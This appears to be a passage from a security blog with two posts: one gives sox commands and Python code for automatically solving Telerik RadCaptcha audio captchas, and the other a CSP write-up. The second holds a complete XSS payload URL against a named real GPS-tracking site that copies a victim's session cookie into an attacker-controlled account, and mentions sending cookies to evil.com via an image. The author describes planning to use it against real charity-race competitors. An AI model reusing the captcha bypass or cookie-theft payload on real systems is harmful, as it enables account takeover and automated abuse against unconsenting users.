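print(solve_captcha(lambda: b"jpeg-bytes", lambda img: next(outputs)))  # → Xk29Q
```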
Now for that audio captcha.
We didn’t really have to design a system to break the image captcha; we just used off-the-shelf tools actually designed for the job. Here though, we need to construct a process for defeating the audio captcha ourselves (since the closest off-the-shelf tools for this are built for clear audio recognition, and they don’t much like captchas).
Let’s pick apart its bad bits and have a think. Listen to it one more time 😛

RadCaptcha_Audio_4ec6deb0.wav
  • The voice uses the NATO phonetic alphabet. This makes each letter last longer, and creates a signature that may be easier to detect.
  • By getting my hands on a copy of the Telerik framework, I could see that the way this system works is that it has one audio recording for each character A-Z, 0-9. The framework stitches combinations of these .WAV files together, adds some noise and then dumps the result as a captcha. The fact each character has only one recording is obviously poor. It’s the equivalent of having no character warping in an image captcha.

Here’s the process I ended up going with:
Firstly: Create some baseline files:

  1. Obtain enough of the audio captcha files so that we have all letters A-Z and all digits 0-9 somewhere in at least one of them.
  2. Remove the “noise” effect from these captcha files.
  3. Cut out each character from the captcha files programmatically by detecting the small silences in-between characters, and save them into their own file. e.g. 9.wav, alfa.wav, bravo.wav etc.

Note: If you have access to a Telerik installation, you could just rip the raw character sound files out of the framework and use those, although I tried this and actually found it made the process less accurate. (It’s also less hacker-like and you lose cool points.)
Then: To perform the character recognition from a captcha:

  1. Take an audio captcha with unknown characters.
  2. Strip the noise.
  3. Split the .WAV on the silence in the same way as before to separate the unknown characters into individual files.
  4. Use an audio fingerprinting tool to match the similarity of our unknown character files against each of the baseline files (alfa.wav etc).
  5. On a reasonably high match, store the matching character and process the next one, etc etc.
  6. Script this whole process. WIN.

Ok, so let’s create those baseline files for starters:
Firstly, save copies of captchas containing A-Z and 0-9. This should be as simple as refreshing the protected page a number of times and saving the .WAVs.
We’ll use the *nix tool sox for most of the audio processing. It’s apparently “the swiss-army-knife of sound processing programs”. That sounds good, I’m sold.

apt-get install sox

To remove the noise from a captcha we first need to create a “noise profile” for it in sox. We can later use this profile to tell sox how to effectively negate the noise and output a “clean” version of the captcha.

sox RadCaptcha_Audio_4ec6deb0.wav -n noiseprof noise.prof
sox RadCaptcha_Audio_4ec6deb0.wav CLEANED_RadCaptcha_Audio_4ec6deb0.wav noisered noise.prof 0.21
CLEANED_RadCaptcha_Audio_4ec6deb0.wav

Now we need to split the captcha at each moment of silence in-between characters, so we can get just the characters we need out of it.

sox -V3 CLEANED_RadCaptcha_Audio_4ec6deb0.wav CHARACTER.wav silence 1 3.0 0.1% 1 0.3 0.1% : newfile : restart

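Under the hood, sox’s silence effect is doing something like the following: scan the samples and cut wherever a long enough run stays below an amplitude threshold. A pure-Python toy version of the idea (the real effect works on durations and percentage thresholds rather than raw sample counts):

```python
def split_on_silence(samples, threshold=0.001, min_gap=3):
    """Split a list of samples into chunks separated by runs of near-silence."""
    chunks, current, quiet = [], [], 0
    for s in samples:
        if abs(s) < threshold:
            quiet += 1
            # A long enough quiet run ends the current character.
            if quiet >= min_gap and current:
                chunks.append(current)
                current = []
        else:
            quiet = 0
            current.append(s)
    if current:
        chunks.append(current)
    return chunks

# Two "characters" separated by a stretch of silence:
print(split_on_silence([0.5, 0.4, 0, 0, 0, 0.7, 0.6]))  # → [[0.5, 0.4], [0.7, 0.6]]
```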
Rename the files to something more sensible (in this case foxtrot.wav), and you should have a bunch of files like this:

Foxtrot.wav

Repeat this enough times and bingo! We have all the characters of the alphabet (in NATO phonetic form) and all digits; de-noised, and contained in their own files.
Ok, so now we want to be able to use these files to detect the characters in a new captcha programmatically. Let’s grab a new captcha (RadCaptcha_Audio_1bc2eaa5.wav) and perform pretty much the same process on that file as we did to generate our base files: strip the noise and separate at the silence. This will give us the unknown characters from a captcha in separate files.

sox RadCaptcha_Audio_1bc2eaa5.wav -n noiseprof noise.prof
sox RadCaptcha_Audio_1bc2eaa5.wav CLEANED_RadCaptcha_Audio_1bc2eaa5.wav noisered noise.prof 0.21
sox -V3 CLEANED_RadCaptcha_Audio_1bc2eaa5.wav UNKNOWN_CHARACTERS.wav silence 1 3.0 0.1% 1 0.3 0.1% : newfile : restart

To compare these unknown character audio files with our baseline ones and determine which characters make up the captcha, I found a pretty good audio fingerprinting Perl script: audio_chromaprint_diff.zip (npointsolutions.blogspot.co.uk/2015/03/comparing-audio-files-with-sense.html).
Either download the above .zip and extract the audio_chromaprint_diff.pl script, or grab it from the above URL.
Quickly install its dependencies:

apt-get/brew install libchromaprint*
cpan install Statistics::LineFit Data::Dumper Capture::Tiny

Audio similarity tools, I have learned, don’t like comparing one-second audio files like my foxtrot.wav and a potential character from an audio captcha. Amazingly, we can defeat this problem by just stretching the audio files. So we do this to all our [A-Z0-9] .WAV files and make them at least 5 seconds apiece (the longer the better).

sox foxtrot.wav foxtrot_slow.wav speed 0.3
foxtrot_slow.wav

The base files won’t sound like numbers or the NATO phonetic letters anymore, but as long as we do the same thing to the unknown characters from a captcha, that doesn’t matter.

sox UNKNOWN_CHARACTERS1of5.wav UNKNOWN_CHARACTERS1of5_slow.wav speed 0.3
UNKNOWN_CHARACTERS1of5_slow.wav

They sound quite similar right? Good. They should, the unknown character is also foxtrot, or “F“.
Time to test the perl script:

root@hiburn8:# perl fingerprint.pl foxtrot_slow.wav UNKNOWN_CHARACTERS1of5_slow.wav | tail -1
Goodness of fit R2 for File1 & File2 = 0.99214093

The files match with over 99% certainty. Seems like a success to me!
All we do now is create a loop to check each unknown character against our base files, and move on to the next character when we get a match somewhere around the 80% mark. It’s not terrifically efficient, but it works.
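That loop might look something like this. A sketch: the similarity callable stands in for running the Perl script and parsing the R2 value off its last line, and the names here are illustrative:

```python
def identify(unknown_files, baselines, similarity, threshold=0.80):
    """Map each unknown character file to its best-matching baseline.

    baselines is a dict like {'f': 'foxtrot_slow.wav', ...}; similarity(a, b)
    returns a 0..1 goodness-of-fit score (e.g. the R2 from the Perl script).
    """
    solved = ""
    for unknown in unknown_files:
        best_char, best_score = None, 0.0
        for char, base in baselines.items():
            score = similarity(unknown, base)
            if score > best_score:
                best_char, best_score = char, score
        if best_score >= threshold:   # the ~80% mark mentioned above
            solved += best_char
    return solved

# Toy similarity: same leading word scores 0.99, everything else 0.1.
sim = lambda a, b: 0.99 if a.split("_")[0] == b.split("_")[0] else 0.1
bases = {"f": "foxtrot_slow.wav", "9": "nine_slow.wav"}
print(identify(["foxtrot_u.wav", "nine_u.wav"], bases, sim))  # → f9
```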
Daniel 2 – Telerik 0
It’s worth stringing processes like this together on a test if they don’t take you more than a few hours. If a developer has made a conscious decision to include a captcha somewhere, he/she has obviously put it there to add security. If you can prove that it doesn’t really work… that’s a finding, regardless of whether you then find other vulnerabilities with the form.
– hiburn8

"Bypassing" CSP's Data-Exfiltration Protections

A long time ago now, I tweeted a challenge to see if anyone knew what the following URL would attempt to do:

http://www.insta-mapper.com/google_map.php?device_id=1234';$.ajax({url:'/wp-login.php?action=register',type:'POST',data:"user_login='dr'&user_email='dr@evil.com'&gclient_id=&gredirect_uri=http://www.insta-mapper.com/&state_uri=http://www.insta-mapper.com&client_id=721352147882378&redirect_uri=http://www.insta-mapper.com&ws_plugin__s2member_registration=e4e7762e6a&ws_plugin__s2member_custom_reg_field_user_pass1='123456'&ws_plugin__s2member_custom_reg_field_user_pass2='123456'&ws_plugin__s2member_custom_reg_field_first_name='d'&ws_plugin__s2member_custom_reg_field_last_name='r'&ws_plugin__s2member_custom_reg_field_address_1='1'&ws_plugin__s2member_custom_reg_field_address_2=&ws_plugin__s2member_custom_reg_field_city=s&ws_plugin__s2member_custom_reg_field_country=u&ws_plugin__s2member_custom_reg_field_mobile_devices='"+encodeURI(document.cookie)+"'&ws_plugin__s2member_custom_reg_field_mobile_devices2=Apple&redirect_to=&wp-submit=Register"});var lol='a

Don’t worry, I don’t expect you to stare at that monstrosity. Instead, I’ll just tell you:
So a friend of mine was competing in WhiteHatRally last year, which is a sort of “solve the clues to figure out where to go”-style car race for charity. He realised that it might be possible to stalk the other competitors, who were displaying their progress on FB via the GPS tracking site insta-mapper.com, in order to determine where they were going and beat them there. So initially we looked at spending a weekend making an app to cheat at a charity race by scraping the other contestants’ locations in semi-real-time… we’re that cool. But I ended up spending the weekend learning the ins and outs of Content Security Policy (CSP) instead, which actually is quite cool.
In failing to make an app to cheat at a charity race, I noticed that the site had pretty dire input validation and pretty much everything was vulnerable to XSS. This was a prime example:
http://www.insta-mapper.com/google_map.php?device_id=1234';alert();
We realised that an even more effective form of cheating would be to compromise the insta-mapper accounts of the other contestants using this XSS, and get a better look at where they were and where they were going… and so we went from making an app to cheat at a charity race to directly attacking its competitors :/ It’s weird how comfortable I was with this.
BUT HOLLLLLLD YOUR HORSES YOUNG PADAWAN! What’s this?
The site had “connect-src” & “form-action” directives in the CSP headers, with values pointing to the site’s own origin. What on earth do they mean? I thought CSP was for blocking XSS?! Well… take a look at these:

  • "connect-src" limits the origins to which you can connect (via XHR, WebSockets, and EventSource).
  • "form-action" lists valid endpoints for submission from <form> tags.
  • "child-src" lists the URLs for workers and embedded frame contents. For example: child-src https://youtube.com would enable embedding videos from YouTube but not from other origins.
  • "img-src" defines the origins from which images can be loaded.
  • "media-src" restricts the origins allowed to deliver video and audio.
  • "font-src" specifies the origins that can serve web fonts.

http://www.html5rocks.com/en/tutorials/security/content-security-policy/
So utilising ALL of these directives, a site can, quite effectively, prevent itself from being used as a base for CSRF against another site, and can prevent data exfiltration from its own pages. Cool!
Now, the insta-mapper app only uses two of these directives, and the others give us clues as to how we might still be able to get data out. We could, for example, inject an image whose location is at evil.com and the file-name is the victim’s session cookie, then simply scrape that from our access logs. But, as a thought experiment, lets assume that insta-mapper used ALL of these directives… then what?
This would mean that, while we have XSS which can grab the session cookies, we can’t actually exfiltrate them out of the application to evil.com, drats! Although, and this is the semi-obvious, yet not so obvious, bit… we hardly ever need to get data OUT of an application, we just have to COPY it somewhere we can see it. With that in mind, this is what the URL above does:
It makes an AJAX POST to the registration page for insta-mapper.com (same origin, totally allowed), creating a new account with a user/pass that we define… and registers a tracking device for that account whose name is document.cookie.
BOOM! All we have to do is send a victim (aka a nice person who has spent their weekend doing something good for charity) this link, log in to the account we made them set up, and look at the account’s device name, which will be the session cookie for the victim!
-hiburn8
As an aside: if the site you’re pwning uses jQuery, or you’re able to bring it in yourself, do yourself a favour and do it. The AJAX functions will make your payloads/attacks smaller and work better across different browsers than including a mess of 10-year-old JS you copied from the web. It’s just as reliable as injecting an auto-submitting form these days and won’t redirect the browser 🙂
Update: I sent Google’s Mike West my thanks for his CSP write-up on HTML5rocks.com and pointed him to my post. He directed me to a blog/paper Michal Zalewski (@lcamtuf) published back in December of 2011, which talks about the many ways in which an attacker can perform content exfiltration. It looks like, at the time, CSP was really only an XSS defence, but it has since grown to include all of the above directives which, one by one, work to solve the data egress methods Michal talks about. We both came to the same conclusion in our posts, though: that same-origin content exfiltration is going to be damn-near impossible to protect against. I’d thoroughly recommend reading his paper: http://lcamtuf.coredump.cx/postxss.